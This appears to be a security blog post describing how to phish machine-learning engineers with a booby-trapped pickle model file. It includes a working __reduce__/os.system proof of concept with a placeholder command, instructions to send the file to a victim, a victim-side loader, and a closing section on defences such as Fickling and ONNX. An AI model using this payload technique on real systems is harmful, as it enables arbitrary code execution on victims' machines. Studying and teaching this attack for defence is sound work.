Phishing Attack Using a Machine Learning Model
I found that two of the ML team members were transferring files related to model training:
The first was serialized data generated by Python’s pickle module.
The second was a Python script that deserializes the first file.
It’s well known that the pickle module demands real care when you use it:
📌 “Never deserialize data from an untrusted source with pickle.”
But they use it for a reason:
The use of pickling conserves memory, enables start-and-stop model training, and makes trained models portable (and, thereby, shareable). Pickling is easy to implement, is built into Python without requiring additional dependencies, and supports serialization of custom objects. There’s little doubt about why choosing pickling for persistence is a popular practice among Python programmers and ML practitioners.
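As a rough sketch of that pattern (the file name and the model object here are placeholders, not taken from the team’s actual scripts):

```python
import pickle

# Stand-in for a trained model; any Python object pickles the same way.
model = {"weights": [0.1, 0.2, 0.3]}

# Persist the model to disk...
with open("model.pkl", "wb") as f:
    pickle.dump(model, f)

# ...and later restore it to resume training or share it with a teammate.
with open("model.pkl", "rb") as f:
    restored = pickle.load(f)
```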
Anyway,
The Attack:
Pre-trained models are typically treated as “free” byproducts of ML since they allow the valuable intellectual property like algorithms and corpora that produced the model to remain private. This gives many people the confidence to share their models over the internet, particularly for reusable computer vision and natural language processing classifiers. Websites like **PyTorch Hub** facilitate model sharing, and some libraries even provide APIs to download models from GitHub repositories automatically.
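For instance, here is a hedged sketch of that auto-download pattern using PyTorch’s torch.hub API (the repo and model names are the usual documentation example, not ones from this engagement):

```python
import torch

# torch.hub fetches the pytorch/vision repo from GitHub and loads a
# pre-trained ResNet-18; under the hood this deserializes checkpoint
# files published by the repo's maintainers.
model = torch.hub.load("pytorch/vision", "resnet18", pretrained=True)
model.eval()
```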
It’s all about crafting a malicious pickle file that the ML engineer will load on their device using Python’s pickle module.
Here is the code I used to create the malicious payload, so you can add it to the pickle file:
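(The original snippet isn’t reproduced here, so below is a minimal sketch of the standard technique: a class whose `__reduce__` method makes pickle run a command at load time. The command and file name are harmless placeholders.)

```python
import os
import pickle

class MaliciousPayload:
    def __reduce__(self):
        # pickle calls this at serialization time and stores the result;
        # at load time it re-runs os.system() with this argument.
        return (os.system, ("whoami > /tmp/pwned.txt",))

# Serialize the payload; these bytes can replace or be spliced into a
# legitimate-looking pickle file before sending it to the target.
with open("model.pkl", "wb") as f:
    pickle.dump(MaliciousPayload(), f)
```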
“For more technical details and the reasoning behind this script, Read This.”
Example:
Add the output to any pickle file and send it to the victim; when they load it with pickle, the command will be executed on their device.
Victim view:
When the victim runs a script like the one below to load the pickle file I just sent, without checking it first, the command will be executed on their device.
The code here is used for some ML work (to make predictions, it seems), but running it on the malicious pickle file that contains my payload will make the system execute the command:
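A hedged sketch of what such a victim-side loader might look like (the file name and the prediction step are assumptions for illustration):

```python
import pickle

# Load the "model" received from a teammate; if the file carries a
# __reduce__ payload, the command executes right here, inside load().
with open("model.pkl", "rb") as f:
    model = pickle.load(f)

# The script then carries on as if a real model had been loaded, e.g.:
# predictions = model.predict(X_test)
```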
Here is the output. A real attacker would keep everything running silently in the background (“blind”).
How to stay safe:
Use Fickling - it has its own implementation of a Pickle Machine (PM), and it is safe to run on potentially malicious files because it symbolically executes code rather than overtly executing it.
You can run Fickling’s static analyses to detect certain classes of malicious pickles by passing the `--check-safety` flag (for example, `fickling --check-safety model.pkl`).
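For quick manual triage there is also a standard-library option (not Fickling itself, just a complementary check): pickletools disassembles the opcode stream without executing it, so an injected GLOBAL/REDUCE pair such as `os.system` stands out.

```python
import pickletools

# Disassemble the pickle's opcodes without running them; look for
# suspicious GLOBAL/STACK_GLOBAL + REDUCE entries such as "os system".
with open("model.pkl", "rb") as f:
    pickletools.dis(f.read())
```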
There are other frameworks that avoid pickle for serialization altogether. For example, the Open Neural Network Exchange (ONNX) aims to provide a universal standard for encoding AI models to improve interoperability, and the ONNX specification uses ProtoBuf to encode its model representations.
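As a hedged sketch of that alternative (assuming PyTorch with its bundled ONNX exporter; the tiny model is a placeholder):

```python
import torch
import torch.nn as nn

model = nn.Linear(4, 2)           # trivial stand-in for a real model
dummy_input = torch.randn(1, 4)   # example input that fixes the graph shape

# Traces the model and writes a ProtoBuf-encoded .onnx file, which
# carries no executable Python code the way a pickle does.
torch.onnx.export(model, dummy_input, "model.onnx")
```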